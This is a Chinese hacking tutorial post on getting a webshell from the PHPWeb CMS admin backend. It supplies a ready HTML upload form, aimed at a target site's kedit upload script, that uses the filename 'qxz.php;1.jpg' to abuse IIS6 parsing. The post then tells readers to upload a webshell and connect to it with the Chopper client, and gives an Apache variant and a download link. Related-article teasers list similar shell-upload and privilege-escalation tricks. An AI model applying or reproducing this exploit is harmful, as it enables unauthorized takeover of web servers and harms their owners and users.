phpweb后台拿shell简单 ***
关于phpweb后台拿shell简单 *** 。
首先登录后台admin.php
登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址。
代码文件如下:
<form name=”uploadForm” method=”post” enctype=”multipart/form-data” action=”http://www.xxx.com/kedit/upload_cgi/upload.php”>
<input type=”text” name=”fileName” value=”qxz.php;1.jpg” />
<input type=”hidden” name=”attachPath” value=”news/pics/” />
<input type=”file” name=”fileData” size=”14″ /></td>
<input type=”submit” name=”button” value=”确定” />
</form>
<input type=”text” name=”fileName” value=”qxz.php;1.jpg” />
<input type=”hidden” name=”attachPath” value=”news/pics/” />
<input type=”file” name=”fileData” size=”14″ /></td>
<input type=”submit” name=”button” value=”确定” />
</form>
然后选择你的马儿再上传
上传后如果为iis6,就点击查看源码就可以找到马儿的路径了。
菜刀链接看下
PS:qxz.php;1.jpg这样的文件是允许上传的,只要服务器是IIS6就拿到webshell,低版本的apache可以试着重命名为qxz.php.jpg
代码文件下载地址:http://pan.baidu.com/s/1eRzHs
相关文章
黑客攻击电子邮件常用方法
黑客攻击电子邮件常用方法:毫无疑问,电子邮件是当今世界上使用最频繁的商务通信工具,据可靠统计显示,目前全球每天的电子邮件发送量已超过500亿条,预计到2008年该数字将增长一倍。 电子邮件的持续升温...
Stunnel应用OpenSSL库开展数据加密
什么叫Stunnel? 此专用工具致力于做为虚拟服务器和远程控制手机客户端中间的SSL数据加密包裝。要是工程建筑全过程合乎其安全设置,Stunnel能够从FIPS 140-2认证OpenSSL FI...
电脑操作系统检验Nmap使用方法
Nmap是一款网络扫描和服务器检验的十分有效的专用工具。 Nmap不是限于只是搜集信息内容和枚举类型,另外能够用于做为一个系统漏洞探测仪或安全性扫描枪。它能够适用winodws,linux,mac等...
帝国cms后台拿shell两种方法
第一种方法: 增加自定义页面 (6.0上实验成功) 模板管理–>增加自定义页面–>页面名称随便–>文件名:x.asp;.html–>页面内容–>小马...
运用环境变量提权的小窍门
今日给大伙儿产生一篇运用环境变量提权的小窍门,我将它称作鬼手,相近三仙归洞中魔术师中的技巧,由于管理人员有可能不经意间中帮鞋大家进行提权全过程。 环境变量一般就是指在电脑操作系统中用于...
PHP后门新玩法:一款猥琐的PHP后门分析
作者: GENXOR [转载请注明出处自 : 360网站卫士博客-blog.wangzhan.360.cn] 0x00 背景...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!